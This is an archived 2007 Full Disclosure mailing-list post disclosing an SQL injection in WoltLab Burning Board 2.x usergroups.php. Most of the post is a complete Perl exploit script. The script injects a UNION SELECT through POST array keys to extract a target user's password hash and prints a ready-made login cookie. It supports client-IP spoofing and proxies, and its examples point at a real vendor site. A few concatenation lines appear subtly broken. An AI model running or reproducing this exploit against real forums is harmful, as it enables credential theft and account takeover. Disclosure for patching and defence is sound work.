Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Woltab Burning Board SQL Injection usergroups.php
From: x666 () Safe-mail net
Date: Wed, 14 Mar 2007 18:04:53 -0400

Hi,

A new SQL Injection in the wbb2.x

[CODE]

/** delete applications (groupleader) **/

if ($action == 'groupleaders_deleteapplications') {

    $deleteids = array();

    if (is_array($_POST['applicationids'])) while (list($applicationid, $val) = each($_POST['applicationids'])) if 
($val == 1) $deleteids[] = $applicationid;

    if ($deleteids) {

        $result = $db->query("SELECT a.applicationid,gl.userid FROM bb".$n."_applications a LEFT JOIN 
bb".$n."_groupleaders gl ON (gl.groupid=a.groupid) WHERE applicationid IN(".implode(",", $deleteids).") AND 
gl.userid='$wbbuserdata[userid]'");

        while ($row = $db->fetch_array($result)) if ($row['userid'] == $wbbuserdata['userid']) 
$db->unbuffered_query("DELETE FROM bb".$n."_applications WHERE applicationid='$row[applicationid]'", 1);

    }

    header("Location: usergroups.php?action=groupleaders" . $SID_ARG_2ND_UN);

    exit;

}

[/CODE]



[EXPLOIT]

#!/usr/bin/perl

#    Woltlab Burning Board 2.X usergroups.php SQL Injection exploit - burned2.pl

#    written by x666 <blueshisha () safe-mail net>

#    jmp-esp.kicks-ass.net;blueshisha.chills.it

#    SR-CREW

#    should work on every wbb regardless of php settings.

#

#

use strict;      

use warnings;    

use LWP::UserAgent;

use HTTP::Response;

use HTTP::Status;

use Getopt::Std;

getopt('uiUpAcC');

our ( $opt_u, $opt_i, $opt_s, $opt_U, $opt_p, $opt_A, $opt_c, $opt_C );

my $target = shift;

sub do_request($$);

if ( !$target ) { &HELP_MESSAGE; }

if ( !$opt_U && !$opt_C) { &HELP_MESSAGE; }

my ( $host, $folder );



if ( $target =~ /(?:http:\/\/)?([\w\.\-\_]*)(\/.*)?/ ) {



    $host = $1;

    $folder = ( $2 ? $2 : '/' );

    if ( $folder !~ /\/$/ ) { $folder .= '/'; }

    $target = "http://$host$folder"; . 'usergroups.php';

}

else { &HELP_MESSAGE; }



my $ip           = ( $opt_i ? $opt_i : '127.0.0.1' );

my ( $userid, $userpassword, $proxy, $proxyip );

( $userid, $userpassword ) = split( ':', $opt_U ) if $opt_U;

( $proxy,  $proxyip )      = split( ':', $opt_p ) if $opt_p;

my $uid = ( $opt_u ? $opt_u : 1 );

my $useragent =

  ( $opt_A ? $opt_A : 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );

my $prefix = ( $opt_c ? $opt_c : 'wbb2_' );

my $isHash = 0;



print "burned2.pl written by x666\n";

print "report errors \@ blueshisha\ () safe-mail net   thx\n";

print "[x] Attacking $target...\n";



if ( $userpassword and $userpassword =~ /([a-f0-9]{32})/ ) { $isHash = 1; }







if ( !$opt_c ) {



my $headers = do_request( '', '' );

if ( $headers =~ /Set-Cookie: (.*?)cookiehash/ ) {

$prefix = $1;

      }

        else { print $headers}

        

    }

    

    print "[x] Cookie prefix: $prefix\n";





print "[x] Vulnerable check:";



my $answer;

my $pre;

$answer = do_request( '\'', '' );



if ( $answer =~ /FROM (.*?)_applications/ ) {

    $pre = $1;

    print " Vulnerable\n";
    

        

}    



elsif ($answer =~ /Ihnen wird der Zutritt zu dieser Seite/

    or $answer =~ /Access denied/ )

{

    print " No Idea\n";

    print "[x] usergroups.php only for users,";

    print " wrong userdetails or wrong cookie-prefix!\n" if $opt_U;

    



    exit;

}

else {

    print " Not Vulnerable!\n";

        print $answer;

    exit;

}



print "[x] Unleashing black magic...\n";


$answer = do_request(

    '/**/UNIoN/**/ SeLeCT/**/ CoNcAT(password,CHAR(39)),'.$userid.' FROM '.$pre.'_users wHere userid%3D'.$uid.'/*%5D',''

);



if ( $answer =~ /${folder}usergroups.php/ and $answer =~ /([a-f0-9]{32})/ ) {

    print "[x] Looks good!\n";

    print "[x] Userid: $uid\n";

    print "[x] Hash: $1\n";

    if ( !$opt_C ) {

        print

"[x] Use this Cookie:\n ${prefix}userid=$uid;${prefix}userpassword=$1\n";

    }



}

else {

    print "[x] Looks bad!\n";

   print $answer;



}



sub HELP_MESSAGE() {

    print "burned2.pl written by x666\n"

      . "perl $0 [options] url\n"

      . "examples:\n"

      . "perl $0 -U 10:123456 woltlab.de/de/forum/\n"

      . "perl $0 -u 2 -i 127.0.0.2 -U 10:123456 woltlab.de/de/forum/\n"

      . "overwrite -c only when the auto-check "

      . "gives you a false result\n"

      . "use -C when you need some special cookies\n"

      . "options :\n-u userid of victim [1]\n"

      . "-i faked client-ip [127.0.0.1]\n"

      . "-U userid:password or userid:pwhash [none]\n"

      . "-p proxyip:proxyport [none]\n"

      . "-A user-agent [firefox 1.5.09]\n"

      . "-c cookie-prefix [auto-check]\n"

      . "-C raw cookie\n";
      

    exit;

}



sub do_request($$) {

    my $string   = shift;

    my $otherurl = shift;

    if ($otherurl) { $target = "http://$host$folder"; . $otherurl; }

    else { $target = "http://$host$folder"; . 'usergroups.php' }

    $string = '/*' if ( !$string );

    my $ua = LWP::UserAgent->new;

    if ($proxy) { $ua->proxy( 'http', "http://$proxy:$proxyip/"; ); }

    my $request = new HTTP::Request( 'POST', $target );

    $request->content( 'applicationids%5B0)' . $string . '%5D=1'

          . '&action=groupleaders_deleteapplications');

    $request->authorization_basic('projectb', 'neustart');      

    $request->content_type('application/x-www-form-urlencoded');

    $request->header( 'User-Agent' => $useragent );

        

    if ($opt_U) {

        my $userhash;

        if ( !$isHash ) { $userhash = md5($userpassword); }

        else { $userhash = $userpassword; }

        my $cookie = $prefix

          . 'userid='

          . $userid . ';'

          . $prefix

          . 'userpassword='

          . $userhash;



        $request->header( 'Cookie' => $cookie );

    }

    elsif ($opt_C) {

        $request->header( 'Cookie' => $opt_C );

        $userid=3265;
    }

    $request->header( 'Client-Ip' => $ip );

    my $response = $ua->request($request);

    my $body     = $response->content;

    my $headers  = $response->headers_as_string;

    

    $body = $response->error_as_HTML if ( $response->is_error );



    return $headers if ( $string eq '/*' and !$response->is_error );

    return $body;

}



# MD5 Code ripped from Libwhisker for bigger portability

# thx rfp :)

{

    my ( @S, @T, @M );

    my $code = '';



    sub md5 {

        return undef if ( !defined $_[0] );    # oops, forgot the data

        my $DATA = _md5_pad( $_[0] );

        &_md5_init() if ( !defined $M[0] );

        return _md5_perl_generated( \$DATA );

    }



    sub _md5_init {

        return if ( defined $S[0] );

        my $i;

        for ( $i = 1 ; $i <= 64 ; $i++ ) {

            $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

        }

        my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

        for ( $i = 0 ; $i < 64 ; $i++ ) {

            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

        }

        @M = (

            0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,

            1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,

            5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,

            0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9

        );

        &_md5_generate();

        my $TEST = _md5_pad('foobar');



        if ( _md5_perl_generated( \$TEST ) ne

            '3858f62230ac3c915f300c664312c63f' )

        {

            die('Error: MD5 self-test not successful.');

        }

    }



    sub _md5_pad {

        my $l = length( my $msg = shift() . chr(128) );

        $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

        $l = ( $l - 1 ) * 8;

        $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

        return $msg;

    }



    sub _md5_generate {

        my $N = 'abcddabccdabbcda';

        my ( $i, $M ) = ( 0, '' );

        $M    = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); # mask for 64bit systems

        $code = <<EOT;

        sub _md5_perl_generated {

    BEGIN { \$^H |= 1; }; # use integer

        my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

        my (\$a,\$b,\$c,\$d,\$t,\$i);

        my \$dr=shift;

        my \$l=length(\$\$dr);

        for my \$L (0 .. ((\$l/64)-1) ) {

                my \ () D = unpack('V16', substr(\$\$dr, \$L*64,64));

                (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

        for ( $i = 0 ; $i < 16 ; $i++ ) {

            my ( $a, $b, $c, $d ) =

              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

            $code .=

              "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

            $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

        }

        for ( ; $i < 32 ; $i++ ) {

            my ( $a, $b, $c, $d ) =

              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

            $code .=

              "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

            $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

        }

        for ( ; $i < 48 ; $i++ ) {

            my ( $a, $b, $c, $d ) =

              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

            $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

            $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

        }

        for ( ; $i < 64 ; $i++ ) {

            my ( $a, $b, $c, $d ) =

              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

            $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

            $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

        }

        $code .= <<EOT;

                \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

                \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

        } # for

    return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

        eval "$code";

    }

}    # md5 package container

[/EXPLOIT]

Greets,
666

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]